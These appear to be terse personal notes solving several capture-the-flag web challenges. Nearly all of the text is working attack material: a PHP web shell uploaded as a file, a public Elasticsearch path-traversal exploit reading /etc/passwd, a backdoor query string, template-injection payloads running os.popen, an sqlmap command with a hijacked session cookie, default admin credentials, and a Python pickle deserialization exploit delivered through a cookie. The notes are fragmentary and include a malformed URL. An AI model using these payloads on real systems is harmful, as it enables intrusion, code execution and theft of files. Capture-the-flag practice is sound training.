Bolt
/login
<?php echo system($_GET['cmd']);?>  html file upload then change as a .php - /rce.php?cmd=cat /flag.txt

Elastic
$sudo apt install exploitdb
$sudo apt install libxml2-utils
$searchsploit elasticsearch
https://github.com/nixawk/labs/blob/master/CVE-2015-5531/exploit.py
python exploit_elastic.py http://34.141.12.127:31590 /etc/passwd

php-unit
burp-suit repeater is request-shi <?php system(‘cat  /flag.txt’)?>

nodiff-backdoor
/?welldone=knockknock&shazam=id
107 src code

Shark
${7*7}
<%
import os 
x=os.popen(‘cat flag’).read()
%>
${x}

<%
x=open("flag", "r")
%>
${x.readlines()}

schematics
/register.php
index.php
lookup products %
from source code take cookie 
sqlmap --cookie="PHPSESSID=a94573086f407c68def5706973b2984" -u http://34.107.45.207:30362/index.php --forms --columns --random-agent

authorization
/auth
client_secrets.json
/auth put burp suite request pretty  
(
 "username" : "admin",
 "password" : "admin"
)
take access token and then + in raw

sweet-and-sour

import pickle
import base64
import requests

class Exploit(object):
		def __reduce__(self):
				return eval, ("open('flag','r').read()",)

def sendPayload(p):
		print(base64.urlsafe_b64encode(p))
		headers = {"Cookie": "data=" + base64.urlsafe_b64encode(p).decode()}
		t = requests.get("http://http://34.107.71.117:32664/dashboard",headers=headers)
		print(t.text)
		
sendPayload(pickle.dumps(Exploit(), protocol=2))


